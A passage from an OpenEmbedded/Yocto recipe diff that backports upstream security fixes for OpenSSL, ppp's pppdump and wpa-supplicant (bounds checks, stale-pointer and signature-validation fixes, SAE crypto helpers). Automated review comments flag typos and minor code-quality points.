file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \
file://afalg.patch \
file://reproducible.patch \
+ file://reproducibility.patch \
+ file://0001-Configure-add-2-missing-key-sorts.patch \
+ file://0001-Configure-do-not-tweak-mips-cflags.patch \
+ file://CVE-2024-0727.patch \
"
SRC_URI_append_class-nativesdk = " \
file://environment.d-openssl.sh \
"
-SRC_URI[sha256sum] = "ddb04774f1e32f0c49751e21b67216ac87852ceb056b75209af2443400636d46"
+SRC_URI[sha256sum] = "cf3098950cb4d853ad95c0841f1f9c6d3dc102dccfcacd521d93925208b76ac8"
inherit lib_package multilib_header multilib_script ptest
MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash"
@@ -179,6 +183,7 @@ do_install_ptest () {
install -m755 ${B}/apps/CA.pl ${D}${PTEST_PATH}/apps
install -d ${D}${PTEST_PATH}/engines
+ install -m755 ${B}/engines/dasync.so ${D}${PTEST_PATH}/engines
install -m755 ${B}/engines/ossltest.so ${D}${PTEST_PATH}/engines
}
@@ -210,6 +215,8 @@ BBCLASSEXTEND = "native nativesdk"
CVE_PRODUCT = "openssl:openssl"
+CVE_VERSION_SUFFIX = "alphabetical"
+
# Only affects OpenSSL >= 1.1.1 in combination with Apache < 2.4.37
# Apache in meta-webserver is already recent enough
CVE_CHECK_WHITELIST += "CVE-2019-0190"
diff --git a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
index b5f68951d7..b0097aa480 100644
--- a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
+++ b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Enables PPP dial-in through a serial connection"
SECTION = "console/network"
+DESCRIPTION = "PPP dail-in provides a point to point protocol (PPP), so that other computers can dial up to it and access connected networks."
DEPENDS = "ppp"
RDEPENDS_${PN} = "ppp"
PR = "r8"
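Review bot: The added DESCRIPTION spells the feature `dail-in`, while the SUMMARY line above it uses `dial-in`. The string is carried into the package metadata, so it should read `DESCRIPTION = "PPP dial-in provides a point to point protocol (PPP), ..."`.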
diff --git a/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
new file mode 100644
index 0000000000..27b8863a4e
--- /dev/null
+++ b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
@@ -0,0 +1,50 @@
+From 2aeb41a9a3a43b11b1e46628d0bf98197ff9f141 Mon Sep 17 00:00:00 2001
+From: Paul Mackerras <paulus@ozlabs.org>
+Date: Thu, 29 Dec 2022 18:00:20 +0100
+Subject: [PATCH] pppdump: Avoid out-of-range access to packet buffer
+
+This fixes a potential vulnerability where data is written to spkt.buf
+and rpkt.buf without a check on the array index. To fix this, we
+check the array index (pkt->cnt) before storing the byte or
+incrementing the count. This also means we no longer have a potential
+signed integer overflow on the increment of pkt->cnt.
+
+Fortunately, pppdump is not used in the normal process of setting up a
+PPP connection, is not installed setuid-root, and is not invoked
+automatically in any scenario that I am aware of.
+
+Ustream-Status: Backport [https://github.com/ppp-project/ppp/commit/a75fb7b198eed50d769c80c36629f38346882cbf]
+CVE: CVE-2022-4603
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+---
+ pppdump/pppdump.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/pppdump/pppdump.c b/pppdump/pppdump.c
+index 87c2e8f..dec4def 100644
+--- a/pppdump/pppdump.c
++++ b/pppdump/pppdump.c
+@@ -296,6 +296,10 @@ dumpppp(f)
+ printf("%s aborted packet:\n ", dir);
+ q = " ";
+ }
++ if (pkt->cnt >= sizeof(pkt->buf)) {
++ printf("%s over-long packet truncated:\n ", dir);
++ q = " ";
++ }
+ nb = pkt->cnt;
+ p = pkt->buf;
+ pkt->cnt = 0;
+@@ -399,7 +403,8 @@ dumpppp(f)
+ c ^= 0x20;
+ pkt->esc = 0;
+ }
+- pkt->buf[pkt->cnt++] = c;
++ if (pkt->cnt < sizeof(pkt->buf))
++ pkt->buf[pkt->cnt++] = c;
+ break;
+ }
+ }
+--
+2.25.1
+
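Review bot: The patch header tag is spelled `Ustream-Status:`, so tooling that scans patch headers for `Upstream-Status:` will probably treat this CVE fix as having no status. It should read `Upstream-Status: Backport [https://github.com/ppp-project/ppp/commit/a75fb7b198eed50d769c80c36629f38346882cbf]`. `Signed-off-by:Minjae Kim` is also missing the space after the colon. In the first pppdump.c hunk the `over-long packet truncated` message is printed when `pkt->cnt >= sizeof(pkt->buf)`, which includes a packet that filled the buffer exactly and lost nothing; this is only a cosmetic inaccuracy in the dump output. The body of `dumpppp` continues outside both hunks.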
diff --git a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
index 60c56dd0bd..51ec25e660 100644
--- a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
+++ b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
@@ -34,6 +34,7 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/${BP}.tar.gz \
file://0001-ppp-Remove-unneeded-include.patch \
file://ppp-2.4.7-DES-openssl.patch \
file://0001-pppd-Fix-bounds-check-in-EAP-code.patch \
+ file://CVE-2022-4603.patch \
"
SRC_URI_append_libc-musl = "\
@@ -42,6 +43,10 @@ SRC_URI_append_libc-musl = "\
SRC_URI[md5sum] = "78818f40e6d33a1d1de68a1551f6595a"
SRC_URI[sha256sum] = "02e0a3dd3e4799e33103f70ec7df75348c8540966ee7c948e4ed8a42bbccfb30"
+# This CVE is specific to a patch applied by Ubuntu that is not used by
+# OpenEmbedded.
+CVE_CHECK_WHITELIST += "CVE-2020-15704"
+
inherit autotools-brokensep systemd
TARGET_CC_ARCH += " ${LDFLAGS}"
diff --git a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
index 67959576e8..5f0a5eac70 100644
--- a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
+++ b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
@@ -11,7 +11,7 @@ AUTHOR = "Thomas Hood"
HOMEPAGE = "http://packages.debian.org/resolvconf"
RDEPENDS_${PN} = "bash"
-SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https;branch=unstable \
file://fix-path-for-busybox.patch \
file://99_resolvconf \
"
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
new file mode 100644
index 0000000000..8c90fa3421
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
@@ -0,0 +1,45 @@
+From 947272febe24a8f0ea828b5b2f35f13c3821901e Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Mon, 9 Nov 2020 11:43:12 +0200
+Subject: [PATCH] P2P: Fix copying of secondary device types for P2P group
+ client
+
+Parsing and copying of WPS secondary device types list was verifying
+that the contents is not too long for the internal maximum in the case
+of WPS messages, but similar validation was missing from the case of P2P
+group information which encodes this information in a different
+attribute. This could result in writing beyond the memory area assigned
+for these entries and corrupting memory within an instance of struct
+p2p_device. This could result in invalid operations and unexpected
+behavior when trying to free pointers from that corrupted memory.
+
+Upstream-Status: Backport
+CVE: CVE-2021-0326
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=947272febe24a8f0ea828b5b2f35f13c3821901e]
+
+Credit to OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=27269
+Fixes: e57ae6e19edf ("P2P: Keep track of secondary device types for peers")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/p2p/p2p.c b/src/p2p/p2p.c
+index a08ba02..079270f 100644
+--- a/src/p2p/p2p.c
++++ b/src/p2p/p2p.c
+@@ -453,6 +453,8 @@ static void p2p_copy_client_info(struct p2p_device *dev,
+ dev->info.config_methods = cli->config_methods;
+ os_memcpy(dev->info.pri_dev_type, cli->pri_dev_type, 8);
+ dev->info.wps_sec_dev_type_list_len = 8 * cli->num_sec_dev_types;
++ if (dev->info.wps_sec_dev_type_list_len > WPS_SEC_DEV_TYPE_MAX_LEN)
++ dev->info.wps_sec_dev_type_list_len = WPS_SEC_DEV_TYPE_MAX_LEN;
+ os_memcpy(dev->info.wps_sec_dev_type_list, cli->sec_dev_types,
+ dev->info.wps_sec_dev_type_list_len);
+ }
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
new file mode 100644
index 0000000000..004b1dbd19
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
@@ -0,0 +1,58 @@
+From 8460e3230988ef2ec13ce6b69b687e941f6cdb32 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 8 Dec 2020 23:52:50 +0200
+Subject: [PATCH] P2P: Fix a corner case in peer addition based on PD Request
+
+p2p_add_device() may remove the oldest entry if there is no room in the
+peer table for a new peer. This would result in any pointer to that
+removed entry becoming stale. A corner case with an invalid PD Request
+frame could result in such a case ending up using (read+write) freed
+memory. This could only by triggered when the peer table has reached its
+maximum size and the PD Request frame is received from the P2P Device
+Address of the oldest remaining entry and the frame has incorrect P2P
+Device Address in the payload.
+
+Fix this by fetching the dev pointer again after having called
+p2p_add_device() so that the stale pointer cannot be used.
+
+Fixes: 17bef1e97a50 ("P2P: Add peer entry based on Provision Discovery Request")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-27803
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=8460e3230988ef2ec13ce6b69b687e941f6cdb32]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p_pd.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/src/p2p/p2p_pd.c b/src/p2p/p2p_pd.c
+index 3994ec0..05fd593 100644
+--- a/src/p2p/p2p_pd.c
++++ b/src/p2p/p2p_pd.c
+@@ -595,14 +595,12 @@ void p2p_process_prov_disc_req(struct p2p_data *p2p, const u8 *sa,
+ goto out;
+ }
+
++ dev = p2p_get_device(p2p, sa);
+ if (!dev) {
+- dev = p2p_get_device(p2p, sa);
+- if (!dev) {
+- p2p_dbg(p2p,
+- "Provision Discovery device not found "
+- MACSTR, MAC2STR(sa));
+- goto out;
+- }
++ p2p_dbg(p2p,
++ "Provision Discovery device not found "
++ MACSTR, MAC2STR(sa));
++ goto out;
+ }
+ } else if (msg.wfd_subelems) {
+ wpabuf_free(dev->info.wfd_subelems);
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
new file mode 100644
index 0000000000..e2540fc26b
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
@@ -0,0 +1,123 @@
+From a0541334a6394f8237a4393b7372693cd7e96f15 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Sat, 13 Mar 2021 18:19:31 +0200
+Subject: [PATCH] ASN.1: Validate DigestAlgorithmIdentifier parameters
+
+The supported hash algorithms do not use AlgorithmIdentifier parameters.
+However, there are implementations that include NULL parameters in
+addition to ones that omit the parameters. Previous implementation did
+not check the parameters value at all which supported both these cases,
+but did not reject any other unexpected information.
+
+Use strict validation of digest algorithm parameters and reject any
+unexpected value when validating a signature. This is needed to prevent
+potential forging attacks.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+
+Upstream-Status: Backport
+CVE: CVE-2021-30004
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=a0541334a6394f8237a4393b7372693cd7e96f15]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/tls/pkcs1.c | 21 +++++++++++++++++++++
+ src/tls/x509v3.c | 20 ++++++++++++++++++++
+ 2 files changed, 41 insertions(+)
+
+diff --git a/src/tls/pkcs1.c b/src/tls/pkcs1.c
+index 141ac50..e09db07 100644
+--- a/src/tls/pkcs1.c
++++ b/src/tls/pkcs1.c
+@@ -240,6 +240,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestInfo",
++ hdr.payload, hdr.length);
+
+ pos = hdr.payload;
+ end = pos + hdr.length;
+@@ -261,6 +263,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestAlgorithmIdentifier",
++ hdr.payload, hdr.length);
+ da_end = hdr.payload + hdr.length;
+
+ if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -269,6 +273,23 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: Digest algorithm parameters",
++ next, da_end - next);
++
++ /*
++ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++ * omit the parameters, but there are implementation that encode these
++ * as a NULL element. Allow these two cases and reject anything else.
++ */
++ if (da_end > next &&
++ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++ !asn1_is_null(&hdr) ||
++ hdr.payload + hdr.length != da_end)) {
++ wpa_printf(MSG_DEBUG,
++ "PKCS #1: Unexpected digest algorithm parameters");
++ os_free(decrypted);
++ return -1;
++ }
+
+ if (!asn1_oid_equal(&oid, hash_alg)) {
+ char txt[100], txt2[100];
+diff --git a/src/tls/x509v3.c b/src/tls/x509v3.c
+index 1bd5aa0..bf2289f 100644
+--- a/src/tls/x509v3.c
++++ b/src/tls/x509v3.c
+@@ -1834,6 +1834,7 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: DigestInfo", hdr.payload, hdr.length);
+
+ pos = hdr.payload;
+ end = pos + hdr.length;
+@@ -1855,6 +1856,8 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: DigestAlgorithmIdentifier",
++ hdr.payload, hdr.length);
+ da_end = hdr.payload + hdr.length;
+
+ if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -1862,6 +1865,23 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: Digest algorithm parameters",
++ next, da_end - next);
++
++ /*
++ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++ * omit the parameters, but there are implementation that encode these
++ * as a NULL element. Allow these two cases and reject anything else.
++ */
++ if (da_end > next &&
++ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++ !asn1_is_null(&hdr) ||
++ hdr.payload + hdr.length != da_end)) {
++ wpa_printf(MSG_DEBUG,
++ "X509: Unexpected digest algorithm parameters");
++ os_free(data);
++ return -1;
++ }
+
+ if (x509_sha1_oid(&oid)) {
+ if (signature->oid.oid[6] != 5 /* sha-1WithRSAEncryption */) {
+--
+2.17.1
+
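Review bot: The digest-parameter check is added verbatim in both `pkcs1_v15_sig_ver` (pkcs1.c) and `x509_check_signature` (x509v3.c), differing only in the log prefix and the buffer freed, so any later correction has to be made in two places. Keeping a backport identical to upstream is reasonable, but a one-line comment on each copy naming the other would help, e.g. `/* keep in sync with x509_check_signature() in x509v3.c */`. The rejection is logged at `MSG_DEBUG`, so at default verbosity a signature rejected for unexpected digest algorithm parameters leaves no trace. Whether that is acceptable depends on how these builds are monitored. Both functions continue outside the hunks.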
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
new file mode 100644
index 0000000000..21e65ba961
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
@@ -0,0 +1,609 @@
+From 208e5687ff2e48622e28d8888ce5444a54353bbd Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 27 Aug 2019 16:33:15 +0300
+Subject: [PATCH 1/4] crypto: Add more bignum/EC helper functions
+
+These are needed for implementing SAE hash-to-element.
+
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
+Upstream-Status: Backport
+https://w1.fi/security/2022-1/
+
+CVE: CVE-2022-23303 CVE-2022-23304
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/crypto/crypto.h | 45 ++++++++++++++++++
+ src/crypto/crypto_openssl.c | 94 +++++++++++++++++++++++++++++++++++++
+ src/crypto/crypto_wolfssl.c | 66 ++++++++++++++++++++++++++
+ 3 files changed, 205 insertions(+)
+
+diff --git a/src/crypto/crypto.h b/src/crypto/crypto.h
+index 15f8ad04cea4..68476dbce96c 100644
+--- a/src/crypto/crypto.h
++++ b/src/crypto/crypto.h
+@@ -518,6 +518,13 @@ struct crypto_bignum * crypto_bignum_init(void);
+ */
+ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len);
+
++/**
++ * crypto_bignum_init_set - Allocate memory for bignum and set the value (uint)
++ * @val: Value to set
++ * Returns: Pointer to allocated bignum or %NULL on failure
++ */
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val);
++
+ /**
+ * crypto_bignum_deinit - Free bignum
+ * @n: Bignum from crypto_bignum_init() or crypto_bignum_init_set()
+@@ -612,6 +619,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ struct crypto_bignum *c);
+
++/**
++ * crypto_bignum_addmod - d = a + b (mod c)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum
++ * @d: Bignum; used to store the result of (a + b) % c
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d);
++
+ /**
+ * crypto_bignum_mulmod - d = a * b (mod c)
+ * @a: Bignum
+@@ -625,6 +645,28 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *c,
+ struct crypto_bignum *d);
+
++/**
++ * crypto_bignum_sqrmod - c = a^2 (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result of a^2 % b
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c);
++
++/**
++ * crypto_bignum_sqrtmod - returns sqrt(a) (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c);
++
+ /**
+ * crypto_bignum_rshift - r = a >> n
+ * @a: Bignum
+@@ -731,6 +773,9 @@ const struct crypto_bignum * crypto_ec_get_prime(struct crypto_ec *e);
+ */
+ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e);
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e);
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e);
++
+ /**
+ * struct crypto_ec_point - Elliptic curve point
+ *
+diff --git a/src/crypto/crypto_openssl.c b/src/crypto/crypto_openssl.c
+index bab33a537293..ed463105e8f1 100644
+--- a/src/crypto/crypto_openssl.c
++++ b/src/crypto/crypto_openssl.c
+@@ -1283,6 +1283,24 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+
+
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++ BIGNUM *bn;
++
++ if (TEST_FAIL())
++ return NULL;
++
++ bn = BN_new();
++ if (!bn)
++ return NULL;
++ if (BN_set_word(bn, val) != 1) {
++ BN_free(bn);
++ return NULL;
++ }
++ return (struct crypto_bignum *) bn;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ if (clear)
+@@ -1449,6 +1467,28 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d)
++{
++ int res;
++ BN_CTX *bnctx;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_add((BIGNUM *) d, (const BIGNUM *) a, (const BIGNUM *) b,
++ (const BIGNUM *) c, bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ const struct crypto_bignum *c,
+@@ -1472,6 +1512,48 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ int res;
++ BN_CTX *bnctx;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_sqr((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++ bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ BN_CTX *bnctx;
++ BIGNUM *res;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_sqrt((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++ bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ struct crypto_bignum *r)
+ {
+@@ -1682,6 +1764,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ if (clear)
+diff --git a/src/crypto/crypto_wolfssl.c b/src/crypto/crypto_wolfssl.c
+index 4cedab4367cd..e9894b335e53 100644
+--- a/src/crypto/crypto_wolfssl.c
++++ b/src/crypto/crypto_wolfssl.c
+@@ -1042,6 +1042,26 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+
+
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++ mp_int *a;
++
++ if (TEST_FAIL())
++ return NULL;
++
++ a = (mp_int *) crypto_bignum_init();
++ if (!a)
++ return NULL;
++
++ if (mp_set_int(a, val) != MP_OKAY) {
++ os_free(a);
++ a = NULL;
++ }
++
++ return (struct crypto_bignum *) a;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ if (!n)
+@@ -1168,6 +1188,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d)
++{
++ if (TEST_FAIL())
++ return -1;
++
++ return mp_addmod((mp_int *) a, (mp_int *) b, (mp_int *) c,
++ (mp_int *) d) == MP_OKAY ? 0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ const struct crypto_bignum *m,
+@@ -1181,6 +1214,27 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ if (TEST_FAIL())
++ return -1;
++
++ return mp_sqrmod((mp_int *) a, (mp_int *) b,
++ (mp_int *) c) == MP_OKAY ? 0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ /* TODO */
++ return -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ struct crypto_bignum *r)
+ {
+@@ -1386,6 +1440,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) &e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) &e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ ecc_point *point = (ecc_point *) p;
+--
+2.25.1
+
+From 2232d3d5f188b65dbb6c823ac62175412739eb16 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 2/4] dragonfly: Add sqrt() helper function
+
+This is a backport of "SAE: Move sqrt() implementation into a helper
+function" to introduce the helper function needed for the following
+patches.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/dragonfly.c | 34 ++++++++++++++++++++++++++++++++++
+ src/common/dragonfly.h | 2 ++
+ 2 files changed, 36 insertions(+)
+
+diff --git a/src/common/dragonfly.c b/src/common/dragonfly.c
+index 547be66f1561..1e842716668e 100644
+--- a/src/common/dragonfly.c
++++ b/src/common/dragonfly.c
+@@ -213,3 +213,37 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ "dragonfly: Unable to get randomness for own scalar");
+ return -1;
+ }
++
++
++/* res = sqrt(val) */
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++ struct crypto_bignum *res)
++{
++ const struct crypto_bignum *prime;
++ struct crypto_bignum *tmp, *one;
++ int ret = 0;
++ u8 prime_bin[DRAGONFLY_MAX_ECC_PRIME_LEN];
++ size_t prime_len;
++
++ /* For prime p such that p = 3 mod 4, sqrt(w) = w^((p+1)/4) mod p */
++
++ prime = crypto_ec_get_prime(ec);
++ prime_len = crypto_ec_prime_len(ec);
++ tmp = crypto_bignum_init();
++ one = crypto_bignum_init_uint(1);
++
++ if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
++ prime_len) < 0 ||
++ (prime_bin[prime_len - 1] & 0x03) != 3 ||
++ !tmp || !one ||
++ /* tmp = (p+1)/4 */
++ crypto_bignum_add(prime, one, tmp) < 0 ||
++ crypto_bignum_rshift(tmp, 2, tmp) < 0 ||
++ /* res = sqrt(val) */
++ crypto_bignum_exptmod(val, tmp, prime, res) < 0)
++ ret = -1;
++
++ crypto_bignum_deinit(tmp, 0);
++ crypto_bignum_deinit(one, 0);
++ return ret;
++}
+diff --git a/src/common/dragonfly.h b/src/common/dragonfly.h
+index ec3dd593eda4..84d67f575c54 100644
+--- a/src/common/dragonfly.h
++++ b/src/common/dragonfly.h
+@@ -27,5 +27,7 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ struct crypto_bignum *_rand,
+ struct crypto_bignum *_mask,
+ struct crypto_bignum *scalar);
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++ struct crypto_bignum *res);
+
+ #endif /* DRAGONFLY_H */
+--
+2.25.1
+
+From fe534b0baaa8c0e6ddeb24cf529d6e50e33dc501 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 3/4] SAE: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/sae.c | 47 +++++++++++++++++++++++++++++++++--------------
+ 1 file changed, 33 insertions(+), 14 deletions(-)
+
+diff --git a/src/common/sae.c b/src/common/sae.c
+index 08fdbfd18173..8d79ed962768 100644
+--- a/src/common/sae.c
++++ b/src/common/sae.c
+@@ -286,14 +286,16 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ int pwd_seed_odd = 0;
